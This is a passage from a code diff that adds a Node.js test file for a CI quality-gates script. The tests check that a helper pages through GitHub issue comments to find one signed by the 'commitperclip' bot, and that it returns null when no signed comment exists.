{ id: 2, account: { login: 'org-two' } },
]), 'jwt'),
/Multiple commitperclip installations found/
);
});

43
.github/scripts/tests/run-quality-gates.test.mjs vendored Normal file
View file

@ -0,0 +1,43 @@
import { test } from 'node:test';
import assert from 'node:assert/strict';
import { findExistingComment } from '../run-quality-gates.mjs';
test('findExistingComment: paginates until it finds the commitperclip comment', async () => {
const seenPaths = [];
const comment = await findExistingComment(async (path) => {
seenPaths.push(path);
if (path.endsWith('page=1')) {
return Array.from({ length: 100 }, (_, index) => ({
id: index + 1,
user: { login: 'someone-else' },
body: 'unrelated',
}));
}
if (path.endsWith('page=2')) {
return [{
id: 200,
user: { login: 'commitperclip[bot]' },
body: 'Looks good.\n\n— commitperclip',
}];
}
return [];
}, 'token', 'paperclipai/paperclip', 6469);
assert.equal(comment.id, 200);
assert.deepEqual(seenPaths, [
'/repos/paperclipai/paperclip/issues/6469/comments?per_page=100&page=1',
'/repos/paperclipai/paperclip/issues/6469/comments?per_page=100&page=2',
]);
});
test('findExistingComment: returns null when no signed comment exists', async () => {
const comment = await findExistingComment(async () => ([
{
id: 1,
user: { login: 'commitperclip[bot]' },
body: 'Unsigned status update',
},
]), 'token', 'paperclipai/paperclip', 6469);
assert.equal(comment, null);
});